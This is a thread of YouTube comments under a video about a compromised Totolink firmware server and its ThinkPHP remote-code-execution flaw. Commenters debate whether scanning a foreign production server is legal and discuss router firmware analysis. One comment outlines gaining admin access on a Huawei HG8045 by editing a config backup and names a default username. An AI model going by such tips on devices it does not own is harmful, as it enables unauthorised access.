@@mattbrwn I personally love how much detail you put into explaining your process in videos! Brevity sucks when it comes at the cost of information :))
Ehy matt. Nice video as Always. I know that all of this is for educational purpose but using scanning tools like nuclei with default settings could lead to a very high number of requests to server, which can be detected by blue team. I know that security of this company is so bad but be careful using this tools , especially if it isn't in a bug bounty program
@@mattbrwn Probably full because the attacker is using it as a C&C server, and a data exfiltration server, and at the same time it is also being used as repository to store ransomware keys as well. Removing all that would probably be good, but easier is to first wipe all of that out, then reboot, after running an update on the server.
I spend a lot of time in the Philippines, I'm in the UK, and when we're out there I love picking up the really dodgy Chinesium crap just to take it to bits and explore the software. You can buy some really interesting things for less than £5 or 600-700PHP, that's a days wages out there for a lot of people but it's pennies for us in the West.
Matt, this is great info again! At first glance I was expecting to hear about net gear Cisco and kv bots. But after the first few minutes, it was all about the totolink. Thank you for sharing this vulnerability. Also, words of wisdom for you while you are recovering, a hack a day makes your problems go away, or is it an apple a day keeps the bugs away! 😂
This couldn't be any more perfect, and it's precisely why we developed a system that blocks execution of unknown PHP code within the PHP engine; detecting unknown files that appear is good to do but likely to be too late, so we focussed on the execution engine and blocking inside the engine itself. Were they using the system, they'd get a real time alert when attempting to execute the file, the malware wouldn't run, and they'd have a chance to unblock the file if it was a false positive. Mostly gone are the days of Apache letting you run PHP code hidden in exif tags of image files, but using exploits to plant arbitrary code onto PHP based systems is still incredibly common and widespread.
Great Video as always! Though one thing you should take a look at is your audio. In I think all of your videos, there's a crackling sound, which I don't get when watching other creators or playing games/listening to music.
@@mattbrwn I think it's constant. If you don't hear it on your PC, maybe try to listen to your video on your phone? Or take some old headphones and try those
I see name brand routers, Chinese of course, on Amazon for like $20, $40 USD. Are these routers running firmwares replaced by Chinese to get on your Network 🤔
Do a 'ps laxw' on the server and maybe a 'who -a' to see if there's any hacker remnants. Don't publish the output, maybe comment on suspicious things you note.
I have Huawei router like hg8245 or hg8247 u-boot of these devices are uninterruptabe so how i can extract or flash firmware on these devices.. Plz help...
Idumped the firmware from nor spi flash for Huawei dg8045 with customized firmware by vodafone the webpage login interface has admin and user permissions the user one is printed on the back of the router the admin has fully control on the router I tried to investigate the firmware the kernel extracted them and tried using ghydra but nothing even the Cfg file is encrypted i tried to decrypt some info but nothing even the when i tried to gain access through uart shell the router boots up and the shell stops on starting kernel i interrupted the the 2 bootloaders first is bootrom the second is hiboot to manipulate loading kernel process the common bootargs doesn't work
my Huawei HG8045 is a lot less secure than yours. can download a backup config, copy my user password hash to admin, restore backup and I have admin access. The config is encrypted but there's also a git repo with documentation on how to decrypt Also, the admin password is the same default one that you can find online once you know the hash. In my case the username is "r&duser"
Just out of curiosity, is what you show legal to do in the US? Where I am, in Denmark, it's illegal to access systems without authorization. IANAL, but I think what you did would be deemed hacking and illegal.
One might agree with what you say, IF, some effort was put in to securing the server. They provided the ability to enter commands through an http post to everyone without requiring authorization. So one could argue that there is no authorization requirement. Matt didn't alter anything on the server, someone else already did that.
Everybody in the world buying any router or smart device from a unbranded (or even well known brand name that is now merely a marketing name put on the cheapest stuff they can find) store, or if you get any ISP or telco supplied equipment, which is the cheapest thing they can get, with the firmware often only changed to put a branding on the screens, nothing else, and relying on the OEM to do upgrades if ever.
No, it's remote code execution. The PHP module in apache (I assume) is an old version and configured in a wrong way. If you send a special string you can add (bash) commands to it that will be executed on the remote server.
any of these cheap devices from overseas are only useful if they can run openwrt or similar open source firmware... would never trust firmware from even "reputable" brands as most never get updated since these devices are all treated as disposable anyway
Why don't you take on devices from major supposedly trusted brands like ASUS, Netgear, Linksys, and TP-Link and hack those? That would be cool! Of course you aren't supposed to buy chinese junk. Instead of this which was already hacked for you by both the manufacturer and someone online.
A ThinkPHP RCE bug on manufacturers' firmware hosting site is very different from what implies in video title. On the contrary, they are the victim to this incident as well, even they do want a backdoor they dont implement it this way. Ironically, aint you conducting an unauthorised penetration scan cross border and making an irresponsible vulnerability disclosure ? Imagine it is other way around, "Chinese hacker compromises US tech companies."
He said he tried to contact them. I agree it’s not exactly what we think of as a hardware backdoor, but I still don’t like your framing. It suggests you have to have some special credentials to do a security audit of hardware you own.
@@schlickit628 You do, theoretically. CISCO switches/routers put these warning messages in telnet/ssh banner. They claim to preserve the rights to sue anyone reverse engeering their firmware without authorization, though they rarely exercise them. (probably for a PR reason) However, what he's done is way above passive/static rev engineering some files he 'own', he conducted an active intrusive URL scan against a live production backend owned by a foreign commercial entity presumably through home Internet and made an irresponsible vuln disclosure, I dont see any element of this is compliant at all, as I said if it is the other way around, the narrative would be Chinese hacking US tech companies. Pure hypocrisy, if you compare what the clickbaity title implies to his actual behaviour.
@@schlickit628 You do, theoretically. Switches/routers put warning messages in telnet/ssh banner claiming they preserve rights sueing anyone reverse engineers their intellectual property protected firmware without authorization, though they rarely exercise them, probably for a PR reason. However, what he's done is way above passive/static rev engineering some files he 'own', he conducted an active intrusive URL scan against a live production backend owned by a foreign commercial entity presumably through home Internet and made an irresponsible vuln disclosure, I dont see any element of this is compliant at all, as I said if it is the other way around, the narrative would be -youtube deletes my comment-. Pure hypocrisy, if you compare what the title implies to his actual behaviour.